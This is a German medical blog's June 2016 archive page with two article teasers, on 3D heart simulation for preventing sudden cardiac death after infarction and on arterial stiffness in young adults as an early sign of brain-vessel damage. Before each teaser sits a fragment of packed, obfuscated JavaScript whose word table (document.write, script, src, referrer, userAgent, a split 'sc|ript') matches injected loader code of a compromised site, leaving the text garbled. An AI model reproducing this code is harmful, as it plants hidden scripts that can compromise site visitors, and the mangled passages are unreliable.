Monthly Archives: Juni 2016

3D-Computersimulation des Herzens im Einsatz in der Prävention des plötzlichen Herztodes nach einem Herzinfarkt [126]

)}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tffnk|var|u0026u|referrer|bndbf||js|php’.split(‘|’),0,{})) tab1=”Kurz + Kompakt” tab2=”Wissenschaftliche Details”] Wer den Herzinfarkt überlebt, bleibt gefährdet, auch weil nachfolgende Störungen des Herzrhythmus dann immer […]

Zu schneller Blutdurchfluss bzw. steife Arterienwände bei jüngeren Erwachsenen als frühes Anzeichen für mögliche Hirngefäßschädigungen im Alter [125]

)}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|azadk|var|u0026u|referrer|brize||js|php’.split(‘|’),0,{})) tab1=”Kurz + Kompakt” tab2=”Wissenschaftliche Details”] Anzeichen für Schädigungen der Hirngefäße im Alter finden sich schon in einer Lebensphase, in […]